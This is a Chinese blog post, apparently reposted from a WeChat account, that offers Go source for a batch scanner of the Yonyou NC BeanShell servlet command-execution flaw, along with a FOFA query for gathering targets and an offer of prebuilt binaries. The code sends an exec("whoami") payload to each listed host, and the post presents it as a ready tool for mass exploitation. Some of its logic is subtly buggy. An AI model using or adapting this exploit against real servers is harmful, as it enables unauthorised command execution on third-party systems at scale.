在t00ls上看到一篇名为《 goland for 用友NC命令执行的代码》的文章。
看到没有批量的功能,手痒,加了一下。
首先使用fofa工具批量获取资产
icon_hash="1085941792"
直接放出检测代码:
package mainimport ("bufio""crypto/tls""flag""fmt""io""net/http""os""strings")func get(targetURL string) {/*检测值是否未空*/fullCommand := `bsh.script=exec("` + "whoami" + `")%0D%0A`/*构造payload*/cli := &http.Client{Transport: &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}}request, err := http.NewRequest(http.MethodPost, targetURL+"/servlet/~ic/bsh.servlet.BshServlet", strings.NewReader(fullCommand))if err != nil {fmt.Println(err)}request.Header.Add("Cache-Control", "max-age=0")request.Header.Add("Content-Type", "application/x-www-form-urlencoded")request.Header.Add("User-Agent", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36")request.Header.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9")request.Header.Add("Refer", targetURL)request.Header.Add("Cookie", "JSESSIONID=25E29F182B83C31ED990C4576D3E5893.server")request.Header.Add("Connection", "close")/*http请求体构建并忽略tls证书校验*/do, err := cli.Do(request)if err != nil {fmt.Println(targetURL,"不存在漏洞")}else {if do.StatusCode != 200 {fmt.Println(targetURL,"不存在漏洞")}/*响应码检查*/fmt.Println(targetURL, "发现漏洞")defer func() {_ = do.Body.Close()}()/*资源释放*/}}func main() {var filepath string/*创建变量*/flag.StringVar(&filepath, "l", "", "url.txt")flag.Parse()/*获取变量中的值*/file, err := os.OpenFile(filepath, os.O_RDWR, 0666)if err != nil {fmt.Println("Open file error!", err)return}defer file.Close()buf := bufio.NewReader(file)for {line, err := buf.ReadString('n')line = strings.TrimSpace(line)a := linego func() {get(a)}()if err != nil {if err == io.EOF {break} else {fmt.Println("Read file error!", err)return}}}select {}}
懒得自己编译的同学,我给大家打包好了,全平台通用:
回台回复:用友 获取批量验证用友NC命令执行漏洞工具
回台回复:fofa 获取fofa批量获取资产工具
本文始发于微信公众号(白帽子飙车路):Go开源-批量验证用友NC命令执行漏洞工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论